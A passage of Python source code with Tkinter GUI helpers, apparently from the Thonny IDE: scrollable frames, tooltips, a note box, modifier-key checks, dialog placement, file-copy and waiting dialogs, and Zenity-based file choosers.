# can shorten closing quote
trivial_for_coloring = '"""' not in line_before and '"""' not in line_after
trivial_for_parens = False
else:
trivial_for_coloring = line_before.count("'''") == line_after.count(
"'''"
) and line_before.count('"""') == line_after.count('"""')
trivial_for_parens = trivial_for_coloring
return trivial_for_coloring, trivial_for_parens
class SafeScrollbar(ttk.Scrollbar):
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
try:
ttk.Scrollbar.set(self, first, last)
except Exception:
traceback.print_exc()
class AutoScrollbar(SafeScrollbar):
# http://effbot.org/zone/tkinter-autoscrollbar.htm
# a vert_scrollbar that hides itself if it's not needed. only
# works if you use the grid geometry manager.
def __init__(self, master=None, **kw):
super().__init__(master=master, **kw)
def set(self, first, last):
if float(first) <= 0.0 and float(last) >= 1.0:
self.grid_remove()
elif float(first) > 0.001 or float(last) < 0.009:
# with >0 and <1 it occasionally made scrollbar wobble back and forth
self.grid()
ttk.Scrollbar.set(self, first, last)
def pack(self, **kw):
raise tk.TclError("cannot use pack with this widget")
def place(self, **kw):
raise tk.TclError("cannot use place with this widget")
def update_entry_text(entry, text):
original_state = entry.cget("state")
entry.config(state="normal")
entry.delete(0, "end")
entry.insert(0, text)
entry.config(state=original_state)
class VerticallyScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self.update_scrollbars()
def _configure_interior(self, event):
self.update_scrollbars()
def update_scrollbars(self):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_width(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
if (
self.interior.winfo_reqwidth() != self.canvas.winfo_width()
and self.canvas.winfo_width() > 10
):
# update the interior's width to fit canvas
# print("CAWI", self.canvas.winfo_width())
self.canvas.itemconfigure(self.interior_id, width=self.canvas.winfo_width())
class ScrollableFrame(ttk.Frame):
# http://tkinter.unpythonic.net/wiki/VerticalScrolledFrame
def __init__(self, master):
ttk.Frame.__init__(self, master)
# set up scrolling with canvas
vscrollbar = ttk.Scrollbar(self, orient=tk.VERTICAL)
hscrollbar = ttk.Scrollbar(self, orient=tk.HORIZONTAL)
self.canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)
vscrollbar.config(command=self.canvas.yview)
hscrollbar.config(command=self.canvas.xview)
self.canvas.xview_moveto(0)
self.canvas.yview_moveto(0)
self.canvas.grid(row=0, column=0, sticky=tk.NSEW)
vscrollbar.grid(row=0, column=1, sticky=tk.NSEW)
hscrollbar.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.interior = ttk.Frame(self.canvas)
self.interior.columnconfigure(0, weight=1)
self.interior.rowconfigure(0, weight=1)
self.interior_id = self.canvas.create_window(0, 0, window=self.interior, anchor=tk.NW)
self.bind("<Configure>", self._configure_interior, "+")
self.bind("<Expose>", self._expose, "+")
def _expose(self, event):
self.update_idletasks()
self._configure_interior(event)
def _configure_interior(self, event):
# update the scrollbars to match the size of the inner frame
size = (self.canvas.winfo_reqwidth(), self.interior.winfo_reqheight())
self.canvas.config(scrollregion="0 0 %s %s" % size)
class ThemedListbox(tk.Listbox):
def __init__(self, master=None, cnf={}, **kw):
super().__init__(master=master, cnf=cnf, **kw)
self._ui_theme_change_binding = self.bind(
"<<ThemeChanged>>", self._reload_theme_options, True
)
self._reload_theme_options()
def _reload_theme_options(self, event=None):
style = ttk.Style()
states = []
if self["state"] == "disabled":
states.append("disabled")
# Following crashes when a combobox is focused
# if self.focus_get() == self:
# states.append("focus")
opts = {}
for key in [
"background",
"foreground",
"highlightthickness",
"highlightcolor",
"highlightbackground",
]:
value = style.lookup(self.get_style_name(), key, states)
if value:
opts[key] = value
self.configure(opts)
def get_style_name(self):
return "Listbox"
def destroy(self):
self.unbind("<<ThemeChanged>>", self._ui_theme_change_binding)
super().destroy()
class ToolTip:
"""Taken from http://www.voidspace.org.uk/python/weblog/arch_d7_2006_07_01.shtml"""
def __init__(self, widget, options):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
self.options = options
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, _, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 27
y = y + cy + self.widget.winfo_rooty() + self.widget.winfo_height() + 2
self.tipwindow = tw = tk.Toplevel(self.widget)
if running_on_mac_os():
try:
# Must be the first thing to do after creating window
# https://wiki.tcl-lang.org/page/MacWindowStyle
tw.tk.call(
"::tk::unsupported::MacWindowStyle", "style", tw._w, "help", "noActivates"
)
if get_tk_version_info() >= (8, 6, 10) and running_on_mac_os():
tw.wm_overrideredirect(1)
except tk.TclError:
pass
else:
tw.wm_overrideredirect(1)
tw.wm_geometry("+%d+%d" % (x, y))
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
tw.wm_transient(self.widget)
label = tk.Label(tw, text=self.text, **self.options)
label.pack()
# get_workbench().bind("WindowFocusOut", self.hidetip, True)
def hidetip(self, event=None):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
# get_workbench().unbind("WindowFocusOut", self.hidetip)
def create_tooltip(widget, text, **kw):
options = get_style_configuration("Tooltip").copy()
options.setdefault("background", "#ffffe0")
options.setdefault("foreground", "#000000")
options.setdefault("relief", "solid")
options.setdefault("borderwidth", 1)
options.setdefault("padx", 1)
options.setdefault("pady", 0)
options.update(kw)
toolTip = ToolTip(widget, options)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind("<Enter>", enter)
widget.bind("<Leave>", leave)
class NoteBox(CommonDialog):
def __init__(self, master=None, max_default_width=300, **kw):
super().__init__(master=master, highlightthickness=0, **kw)
self._max_default_width = max_default_width
self.wm_overrideredirect(True)
if running_on_mac_os():
# TODO: maybe it's because of Tk 8.5, not because of Mac
self.wm_transient(master)
try:
# For Mac OS
self.tk.call(
"::tk::unsupported::MacWindowStyle", "style", self._w, "help", "noActivates"
)
except tk.TclError:
pass
self._current_chars = ""
self._click_bindings = {}
self.padx = 5
self.pady = 5
self.text = TweakableText(
self,
background="#ffffe0",
borderwidth=1,
relief="solid",
undo=False,
read_only=True,
font="TkDefaultFont",
highlightthickness=0,
padx=self.padx,
pady=self.pady,
wrap="word",
)
self.text.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
self.text.bind("<Escape>", self.close, True)
# tk._default_root.bind_all("<1>", self._close_maybe, True)
# tk._default_root.bind_all("<Key>", self.close, True)
self.withdraw()
def clear(self):
for tag in self._click_bindings:
self.text.tag_unbind(tag, "<1>", self._click_bindings[tag])
self.text.tag_remove(tag, "1.0", "end")
self.text.direct_delete("1.0", "end")
self._current_chars = ""
self._click_bindings.clear()
def set_content(self, *items):
self.clear()
for item in items:
if isinstance(item, str):
self.text.direct_insert("1.0", item)
self._current_chars = item
else:
assert isinstance(item, (list, tuple))
chars, *props = item
if len(props) > 0 and callable(props[-1]):
tags = tuple(props[:-1])
click_handler = props[-1]
else:
tags = tuple(props)
click_handler = None
self.append_text(chars, tags, click_handler)
self.text.see("1.0")
def append_text(self, chars, tags=(), click_handler=None):
tags = tuple(tags)
if click_handler is not None:
click_tag = "click_%d" % len(self._click_bindings)
tags = tags + (click_tag,)
binding = self.text.tag_bind(click_tag, "<1>", click_handler, True)
self._click_bindings[click_tag] = binding
self.text.direct_insert("end", chars, tags)
self._current_chars += chars
def place(self, target, focus=None):
# Compute the area that will be described by this Note
focus_x = target.winfo_rootx()
focus_y = target.winfo_rooty()
focus_height = target.winfo_height()
if isinstance(focus, TextRange):
assert isinstance(target, tk.Text)
topleft = target.bbox("%d.%d" % (focus.lineno, focus.col_offset))
if focus.end_col_offset == 0:
botright = target.bbox(
"%d.%d lineend" % (focus.end_lineno - 1, focus.end_lineno - 1)
)
else:
botright = target.bbox("%d.%d" % (focus.end_lineno, focus.end_col_offset))
if topleft and botright:
focus_x += topleft[0]
focus_y += topleft[1]
focus_height = botright[1] - topleft[1] + botright[3]
elif isinstance(focus, (list, tuple)):
focus_x += focus[0]
focus_y += focus[1]
focus_height = focus[3]
elif focus is None:
pass
else:
raise TypeError("Unsupported focus")
# Compute dimensions of the note
font = self.text["font"]
if isinstance(font, str):
font = tk.font.nametofont(font)
lines = self._current_chars.splitlines()
max_line_width = 0
for line in lines:
max_line_width = max(max_line_width, font.measure(line))
width = min(max_line_width, self._max_default_width) + self.padx * 2 + 2
self.wm_geometry("%dx%d+%d+%d" % (width, 100, focus_x, focus_y + focus_height))
self.update_idletasks()
line_count = int(float(self.text.index("end")))
line_height = font.metrics()["linespace"]
self.wm_geometry(
"%dx%d+%d+%d" % (width, line_count * line_height, focus_x, focus_y + focus_height)
)
# TODO: detect the situation when note doesn't fit under
# the focus box and should be placed above
self.deiconify()
def show_note(self, *content_items: Union[str, List], target=None, focus=None) -> None:
self.set_content(*content_items)
self.place(target, focus)
def _close_maybe(self, event):
if event.widget not in [self, self.text]:
self.close(event)
def close(self, event=None):
self.withdraw()
def get_widget_offset_from_toplevel(widget):
x = 0
y = 0
toplevel = widget.winfo_toplevel()
while widget != toplevel:
x += widget.winfo_x()
y += widget.winfo_y()
widget = widget.master
return x, y
class EnhancedVar(tk.Variable):
def __init__(self, master=None, value=None, name=None, modification_listener=None):
if master is not None and not isinstance(master, (tk.Widget, tk.Wm)):
raise TypeError("First positional argument 'master' must be None, Widget or Wm")
super().__init__(master=master, value=value, name=name)
self.modified = False
self.modification_listener = modification_listener
if sys.version_info < (3, 6):
self.trace("w", self._on_write)
else:
self.trace_add("write", self._on_write)
def _on_write(self, *args):
self.modified = True
if self.modification_listener:
try:
self.modification_listener()
except Exception:
# Otherwise whole process will be brought down
# because for some reason Tk tries to call non-existing method
# on variable
get_workbench().report_exception()
class EnhancedStringVar(EnhancedVar, tk.StringVar):
pass
class EnhancedIntVar(EnhancedVar, tk.IntVar):
pass
class EnhancedBooleanVar(EnhancedVar, tk.BooleanVar):
pass
class EnhancedDoubleVar(EnhancedVar, tk.DoubleVar):
pass
def create_string_var(value, modification_listener=None) -> EnhancedStringVar:
"""Creates a tk.StringVar with "modified" attribute
showing whether the variable has been modified after creation"""
return EnhancedStringVar(None, value, None, modification_listener)
def create_int_var(value, modification_listener=None) -> EnhancedIntVar:
"""See create_string_var"""
return EnhancedIntVar(None, value, None, modification_listener)
def create_double_var(value, modification_listener=None) -> EnhancedDoubleVar:
"""See create_string_var"""
return EnhancedDoubleVar(None, value, None, modification_listener)
def create_boolean_var(value, modification_listener=None) -> EnhancedBooleanVar:
"""See create_string_var"""
return EnhancedBooleanVar(None, value, None, modification_listener)
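# Usage sketch for the create_*_var helpers (illustrative; the listener below is a
# hypothetical callback, not part of this module):
#
#     def _on_change():
#         print("value changed")
#
#     var = create_string_var("initial", modification_listener=_on_change)
#     var.set("new value")   # triggers _on_change; var.modified becomes True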
def shift_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0001
def caps_lock_is_on(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0002
def control_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0004
def command_is_pressed(event_state):
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# http://stackoverflow.com/q/32426250/261181
return event_state & 0x0008
def modifier_is_pressed(event_state: int) -> bool:
return event_state != 0 and event_state != 0b10000
def get_hyperlink_cursor() -> str:
if running_on_mac_os():
return "pointinghand"
else:
return "hand2"
def sequence_to_event_state_and_keycode(sequence: str) -> Optional[Tuple[int, int]]:
# remember handlers for certain shortcuts which require
# different treatment on non-latin keyboards
if sequence[0] != "<":
return None
parts = sequence.strip("<").strip(">").split("-")
# support only latin letters for now
if parts[-1].lower() not in list("abcdefghijklmnopqrstuvwxyz"):
return None
letter = parts.pop(-1)
if "Key" in parts:
parts.remove("Key")
if "key" in parts:
parts.remove("key")
modifiers = {part.lower() for part in parts}
if letter.isupper():
modifiers.add("shift")
if modifiers not in [{"control"}, {"control", "shift"}]:
# don't support others for now
return None
event_state = 0
# http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
# https://stackoverflow.com/questions/32426250/python-documentation-and-or-lack-thereof-e-g-keyboard-event-state
for modifier in modifiers:
if modifier == "shift":
event_state |= 0x0001
elif modifier == "control":
event_state |= 0x0004
else:
# unsupported modifier
return None
# for latin letters keycode is same as its ascii code
return (event_state, ord(letter.upper()))
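# Illustrative results of sequence_to_event_state_and_keycode:
#   "<Control-s>"       -> (0x0004, ord("S"))          i.e. (4, 83)
#   "<Control-Shift-S>" -> (0x0004 | 0x0001, ord("S")) i.e. (5, 83)
#   "<Alt-s>"           -> None   (only Control and Control+Shift are supported)
#   "<Control-F5>"      -> None   (only latin letters are supported)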
def select_sequence(win_version, mac_version, linux_version=None):
if running_on_windows():
return win_version
elif running_on_mac_os():
return mac_version
elif running_on_linux() and linux_version:
return linux_version
else:
return win_version
def try_remove_linenumbers(text, master):
try:
if has_line_numbers(text) and messagebox.askyesno(
title="Remove linenumbers",
message="Do you want to remove linenumbers from pasted text?",
default=messagebox.YES,
master=master,
):
return remove_line_numbers(text)
else:
return text
except Exception:
traceback.print_exc()
return text
def has_line_numbers(text):
lines = text.splitlines()
return len(lines) > 2 and all([len(split_after_line_number(line)) == 2 for line in lines])
def split_after_line_number(s):
parts = re.split(r"(^\s*\d+\.?)", s)
if len(parts) == 1:
return parts
else:
assert len(parts) == 3 and parts[0] == ""
return parts[1:]
def remove_line_numbers(s):
cleaned_lines = []
for line in s.splitlines():
parts = split_after_line_number(line)
if len(parts) != 2:
return s
else:
cleaned_lines.append(parts[1])
return textwrap.dedent(("\n".join(cleaned_lines)) + "\n")
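# Illustrative example of the line-number stripping helpers above
# (e.g. when pasting code copied from a numbered listing):
#
#     has_line_numbers("1. import os\n2. print(os.sep)\n3. print('done')")
#         -> True
#     remove_line_numbers("1. import os\n2. print(os.sep)\n3. print('done')")
#         -> "import os\nprint(os.sep)\nprint('done')\n"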
def center_window(win, master=None):
# for backward compat
return assign_geometry(win, master)
def assign_geometry(win, master=None, min_left=0, min_top=0):
if master is None:
master = tk._default_root
size = get_workbench().get_option(get_size_option_name(win))
if size:
width, height = size
saved_size = True
else:
fallback_width = 600
fallback_height = 400
# need to wait until size is computed
# (unfortunately this causes dialog to jump)
if getattr(master, "initializing", False):
# can't get reliable positions when main window is not in mainloop yet
width = fallback_width
height = fallback_height
else:
if not running_on_linux():
# better to avoid in Linux because it causes ugly jump
win.update_idletasks()
# looks like it doesn't take window border into account
width = win.winfo_width()
height = win.winfo_height()
if width < 10:
# ie. size measurement is not correct
width = fallback_width
height = fallback_height
saved_size = False
left = master.winfo_rootx() + master.winfo_width() // 2 - width // 2
top = master.winfo_rooty() + master.winfo_height() // 2 - height // 2
left = max(left, min_left)
top = max(top, min_top)
if saved_size:
win.geometry("%dx%d+%d+%d" % (width, height, left, top))
else:
win.geometry("+%d+%d" % (left, top))
class WaitingDialog(CommonDialog):
def __init__(self, master, async_result, description, title="Please wait!", timeout=None):
self._async_result = async_result
super().__init__(master)
if misc_utils.running_on_mac_os():
self.configure(background="systemSheetBackground")
self.title(title)
self.resizable(height=tk.FALSE, width=tk.FALSE)
# self.protocol("WM_DELETE_WINDOW", self._close)
self.desc_label = ttk.Label(self, text=description, wraplength=300)
self.desc_label.grid(padx=20, pady=20)
self.update_idletasks()
self.timeout = timeout
self.start_time = time.time()
self.after(500, self._poll)
def _poll(self):
if self._async_result.ready():
self._close()
elif self.timeout and time.time() - self.start_time > self.timeout:
raise TimeoutError()
else:
self.after(500, self._poll)
self.desc_label["text"] = self.desc_label["text"] + "."
def _close(self):
self.destroy()
def run_with_waiting_dialog(master, action, args=(), description="Working"):
# http://stackoverflow.com/a/14299004/261181
from multiprocessing.pool import ThreadPool
pool = ThreadPool(processes=1)
async_result = pool.apply_async(action, args)
dlg = WaitingDialog(master, async_result, description=description)
show_dialog(dlg, master)
return async_result.get()
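# Usage sketch for run_with_waiting_dialog (illustrative; `slow_download` is a
# hypothetical long-running function, not part of this module):
#
#     result = run_with_waiting_dialog(
#         get_workbench(),
#         slow_download,
#         args=("https://example.com/file.zip",),
#         description="Downloading",
#     )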
class FileCopyDialog(CommonDialog):
def __init__(self, master, source, destination, description=None, fsync=True):
self._source = source
self._destination = destination
self._old_bytes_copied = 0
self._bytes_copied = 0
self._fsync = fsync
self._done = False
self._cancelled = False
self._closed = False
super().__init__(master)
main_frame = ttk.Frame(self) # To get styled background
main_frame.grid(row=0, column=0, sticky="nsew")
self.rowconfigure(0, weight=1)
self.columnconfigure(0, weight=1)
self.title(tr("Copying"))
if description is None:
description = tr("Copying\n %s\nto\n %s") % (source, destination)
label = ttk.Label(main_frame, text=description)
label.grid(row=0, column=0, columnspan=2, sticky="nw", padx=15, pady=15)
self._bar = ttk.Progressbar(main_frame, maximum=os.path.getsize(source), length=200)
self._bar.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=15, pady=0)
self._cancel_button = ttk.Button(main_frame, text=tr("Cancel"), command=self._cancel)
self._cancel_button.grid(row=2, column=1, sticky="ne", padx=15, pady=15)
self._bar.focus_set()
main_frame.columnconfigure(0, weight=1)
self._update_progress()
self.bind("<Escape>", self._cancel, True) # escape-close only if process has completed
self.protocol("WM_DELETE_WINDOW", self._cancel)
self._start()
def _start(self):
def work():
self._copy_progress = 0
with open(self._source, "rb") as fsrc:
with open(self._destination, "wb") as fdst:
while True:
buf = fsrc.read(16 * 1024)
if not buf:
break
fdst.write(buf)
fdst.flush()
if self._fsync:
os.fsync(fdst)
self._bytes_copied += len(buf)
self._done = True
threading.Thread(target=work, daemon=True).start()
def _update_progress(self):
if self._done:
if not self._closed:
self._close()
return
self._bar.step(self._bytes_copied - self._old_bytes_copied)
self._old_bytes_copied = self._bytes_copied
self.after(100, self._update_progress)
def _close(self):
self.destroy()
self._closed = True
def _cancel(self, event=None):
self._cancelled = True
self._close()
class ChoiceDialog(CommonDialogEx):
def __init__(
self,
master=None,
title="Choose one",
question: str = "Choose one:",
choices=[],
initial_choice_index=None,
) -> None:
super().__init__(master=master)
self.title(title)
self.resizable(False, False)
self.main_frame.columnconfigure(0, weight=1)
row = 0
question_label = ttk.Label(self.main_frame, text=question)
question_label.grid(row=row, column=0, columnspan=2, sticky="w", padx=20, pady=20)
row += 1
self.var = tk.StringVar(value="")
if initial_choice_index is not None:
self.var.set(choices[initial_choice_index])
for choice in choices:
rb = ttk.Radiobutton(self.main_frame, text=choice, variable=self.var, value=choice)
rb.grid(row=row, column=0, columnspan=2, sticky="w", padx=20)
row += 1
ok_button = ttk.Button(self.main_frame, text=tr("OK"), command=self._ok, default="active")
ok_button.grid(row=row, column=0, sticky="e", pady=20)
cancel_button = ttk.Button(self.main_frame, text=tr("Cancel"), command=self._cancel)
cancel_button.grid(row=row, column=1, sticky="e", padx=20, pady=20)
self.bind("<Escape>", self._cancel, True)
self.bind("<Return>", self._ok, True)
self.protocol("WM_DELETE_WINDOW", self._cancel)
def _ok(self):
self.result = self.var.get()
if not self.result:
self.result = None
self.destroy()
def _cancel(self):
self.result = None
self.destroy()
class LongTextDialog(CommonDialog):
def __init__(self, title, text_content, parent=None):
if parent is None:
parent = tk._default_root
super().__init__(master=parent)
self.title(title)
main_frame = ttk.Frame(self)
main_frame.grid(row=0, column=0, sticky="nsew")
self.columnconfigure(0, weight=1)
self.rowconfigure(0, weight=1)
default_font = tk.font.nametofont("TkDefaultFont")
self._text = tktextext.TextFrame(
main_frame,
read_only=True,
wrap="none",
font=default_font,
width=80,
height=10,
relief="sunken",
borderwidth=1,
)
self._text.grid(row=1, column=0, columnspan=2, sticky="nsew", padx=20, pady=20)
self._text.text.direct_insert("1.0", text_content)
self._text.text.see("1.0")
copy_button = ttk.Button(
main_frame, command=self._copy, text=tr("Copy to clipboard"), width=20
)
copy_button.grid(row=2, column=0, sticky="w", padx=20, pady=(0, 20))
close_button = ttk.Button(
main_frame, command=self._close, text=tr("Close"), default="active"
)
close_button.grid(row=2, column=1, sticky="w", padx=20, pady=(0, 20))
close_button.focus_set()
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close, True)
def _copy(self, event=None):
self.clipboard_clear()
self.clipboard_append(self._text.text.get("1.0", "end"))
def _close(self, event=None):
self.destroy()
def ask_one_from_choices(
master=None,
title="Choose one",
question: str = "Choose one:",
choices=[],
initial_choice_index=None,
):
dlg = ChoiceDialog(master, title, question, choices, initial_choice_index)
show_dialog(dlg, master)
return dlg.result
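# Usage sketch for ask_one_from_choices (illustrative only):
#
#     port = ask_one_from_choices(
#         master=get_workbench(),
#         title="Select port",
#         question="Which port should be used?",
#         choices=["COM3", "COM4"],
#         initial_choice_index=0,
#     )
#     # `port` is the chosen string, or None if the dialog was cancelled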
def get_busy_cursor():
if running_on_windows():
return "wait"
elif running_on_mac_os():
return "spinning"
else:
return "watch"
def get_tk_version_str():
return tk._default_root.tk.call("info", "patchlevel")
def get_tk_version_info():
result = []
for part in get_tk_version_str().split("."):
try:
result.append(int(part))
except Exception:
result.append(0)
return tuple(result)
def get_style_configuration(style_name, default={}):
style = ttk.Style()
# NB! style.configure seems to reuse the returned dict
# Don't change it without copying first
result = style.configure(style_name)
if result is None:
return default
else:
return result
def lookup_style_option(style_name, option_name, default=None):
style = ttk.Style()
setting = style.lookup(style_name, option_name)
if setting in [None, ""]:
return default
elif setting == "True":
return True
elif setting == "False":
return False
else:
return setting
def scale(value):
return get_workbench().scale(value)
def open_path_in_system_file_manager(path):
if running_on_mac_os():
# http://stackoverflow.com/a/3520693/261181
# -R doesn't allow showing hidden folders
subprocess.Popen(["open", path])
elif running_on_linux():
subprocess.Popen(["xdg-open", path])
else:
assert running_on_windows()
subprocess.Popen(["explorer", path])
def _get_dialog_provider():
if platform.system() != "Linux" or get_workbench().get_option("file.avoid_zenity"):
return filedialog
import shutil
if shutil.which("zenity"):
return _ZenityDialogProvider
# fallback
return filedialog
def asksaveasfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getSaveFile.htm
_check_dialog_parent(options)
return _get_dialog_provider().asksaveasfilename(**options)
def askopenfilename(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_check_dialog_parent(options)
return _get_dialog_provider().askopenfilename(**options)
def askopenfilenames(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/getOpenFile.htm
_check_dialog_parent(options)
return _get_dialog_provider().askopenfilenames(**options)
def askdirectory(**options):
# https://tcl.tk/man/tcl8.6/TkCmd/chooseDirectory.htm
_check_dialog_parent(options)
return _get_dialog_provider().askdirectory(**options)
def _check_dialog_parent(options):
if options.get("parent") and options.get("master"):
parent = options["parent"].winfo_toplevel()
master = options["master"].winfo_toplevel()
if parent is not master:
logger.warning(
"Dialog with different parent/master toplevels:\n%s",
"".join(traceback.format_stack()),
)
elif options.get("parent"):
parent = options["parent"].winfo_toplevel()
master = options["parent"].winfo_toplevel()
elif options.get("master"):
parent = options["master"].winfo_toplevel()
master = options["master"].winfo_toplevel()
else:
logger.warning("Dialog without parent:\n%s", "".join(traceback.format_stack()))
parent = tk._default_root
master = tk._default_root
options["parent"] = parent
options["master"] = master
if running_on_mac_os():
# used to require master/parent (https://bugs.python.org/issue34927)
# but this is deprecated in Catalina (https://github.com/thonny/thonny/issues/840)
# TODO: Consider removing this when upgrading from Tk 8.6.8
del options["master"]
del options["parent"]
class _ZenityDialogProvider:
# https://www.writebash.com/bash-gui/zenity-create-file-selection-dialog-224.html
# http://linux.byexamples.com/archives/259/a-complete-zenity-dialog-examples-1/
# http://linux.byexamples.com/archives/265/a-complete-zenity-dialog-examples-2/
# another possibility is to use PyGobject: https://github.com/poulp/zenipy
@classmethod
def askopenfilename(cls, **options):
args = cls._convert_common_options("Open file", **options)
return cls._call(args)
@classmethod
def askopenfilenames(cls, **options):
args = cls._convert_common_options("Open files", **options)
return cls._call(args + ["--multiple"]).split("|")
@classmethod
def asksaveasfilename(cls, **options):
args = cls._convert_common_options("Save as", **options)
args.append("--save")
if options.get("confirmoverwrite", True):
args.append("--confirm-overwrite")
filename = cls._call(args)
if not filename:
return None
if "defaultextension" in options and "." not in os.path.basename(filename):
filename += options["defaultextension"]
return filename
@classmethod
def askdirectory(cls, **options):
args = cls._convert_common_options("Select directory", **options)
args.append("--directory")
return cls._call(args)
@classmethod
def _convert_common_options(cls, default_title, **options):
args = ["--file-selection", "--title=%s" % options.get("title", default_title)]
filename = _options_to_zenity_filename(options)
if filename:
args.append("--filename=%s" % filename)
parent = options.get("parent", options.get("master", None))
if parent is not None:
args.append("--modal")
args.append("--attach=%s" % hex(parent.winfo_id()))
for desc, pattern in options.get("filetypes", ()):
# zenity requires star before extension
pattern = pattern.replace(" .", " *.")
if pattern.startswith("."):
pattern = "*" + pattern
if pattern == "*.*":
# ".*" was provided to make the pattern safe for Tk dialog
# not required with Zenity
pattern = "*"
args.append("--file-filter=%s | %s" % (desc, pattern))
return args
@classmethod
def _call(cls, args):
args = ["zenity", "--name=Thonny", "--class=Thonny"] + args
result = subprocess.run(
args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
if result.returncode == 0:
return result.stdout.strip()
else:
# TODO: log problems
print(result.stderr, file=sys.stderr)
# could check stderr, but it may contain irrelevant warnings
return None
def _options_to_zenity_filename(options):
if options.get("initialdir"):
if options.get("initialfile"):
return os.path.join(options["initialdir"], options["initialfile"])
else:
return options["initialdir"] + os.path.sep
return None
def register_latin_shortcut(
registry, sequence: str, handler: Callable, tester: Optional[Callable]
) -> None:
res = sequence_to_event_state_and_keycode(sequence)
if res is not None:
if res not in registry:
registry[res] = []
registry[res].append((handler, tester))
def handle_mistreated_latin_shortcuts(registry, event):
# tries to handle Ctrl+LatinLetter shortcuts
# given from non-Latin keyboards
# See: https://bitbucket.org/plas/thonny/issues/422/edit-keyboard-shortcuts-ctrl-c-ctrl-v-etc
# only consider events with Control held
if not event.state & 0x04:
return
if running_on_mac_os():
return
# consider only part of the state,
# because at least on Windows, Ctrl-shortcuts' state
# has something extra
simplified_state = 0x04
if shift_is_pressed(event.state):
simplified_state |= 0x01
# print(simplified_state, event.keycode)
if (simplified_state, event.keycode) in registry:
if event.keycode != ord(event.char) and event.keysym in (None, "??"):
# keycode and char doesn't match,
# this means non-latin keyboard
for handler, tester in registry[(simplified_state, event.keycode)]:
if tester is None or tester():
handler()
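# Usage sketch for the latin-shortcut helpers above (illustrative; `registry` and
# `handle_copy` are hypothetical names):
#
#     registry = {}
#     register_latin_shortcut(registry, "<Control-c>", handle_copy, tester=None)
#     # then, in a global <Key> handler:
#     # text_widget.bind("<Key>", lambda e: handle_mistreated_latin_shortcuts(registry, e), True)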
def show_dialog(dlg, master=None, geometry=True, min_left=0, min_top=0):
if getattr(dlg, "closed", False):
return
if master is None:
master = getattr(dlg, "parent", None) or getattr(dlg, "master", None) or tk._default_root
master = master.winfo_toplevel()
get_workbench().event_generate("WindowFocusOut")
# following order seems to give most smooth appearance
focused_widget = master.focus_get()
dlg.transient(master.winfo_toplevel())
if geometry:
# dlg.withdraw() # unfortunately inhibits size calculations in assign_geometry
if isinstance(geometry, str):
dlg.geometry(geometry)
else:
assign_geometry(dlg, master, min_left, min_top)
# dlg.wm_deiconify()
dlg.lift()
dlg.focus_set()
try:
dlg.grab_set()
except TclError as e:
print("Can't grab:", e, file=sys.stderr)
master.winfo_toplevel().wait_window(dlg)
dlg.grab_release()
master.winfo_toplevel().lift()
master.winfo_toplevel().focus_force()
master.winfo_toplevel().grab_set()
if running_on_mac_os():
master.winfo_toplevel().grab_release()
if focused_widget is not None:
try:
focused_widget.focus_force()
except TclError:
pass
def popen_with_ui_thread_callback(*Popen_args, on_completion, poll_delay=0.1, **Popen_kwargs):
if "encoding" not in Popen_kwargs:
if "env" not in Popen_kwargs:
Popen_kwargs["env"] = os.environ.copy()
Popen_kwargs["env"]["PYTHONIOENCODING"] = "utf-8"
if sys.version_info >= (3, 6):
Popen_kwargs["encoding"] = "utf-8"
proc = subprocess.Popen(*Popen_args, **Popen_kwargs)
# Need to read in thread in order to avoid blocking because
# of full pipe buffer (see https://bugs.python.org/issue1256)
out_lines = []
err_lines = []
def read_stream(stream, target_list):
while True:
line = stream.readline()
if line:
target_list.append(line)
else:
break
t_out = threading.Thread(target=read_stream, daemon=True, args=(proc.stdout, out_lines))
t_err = threading.Thread(target=read_stream, daemon=True, args=(proc.stderr, err_lines))
t_out.start()
t_err.start()
def poll():
if proc.poll() is not None:
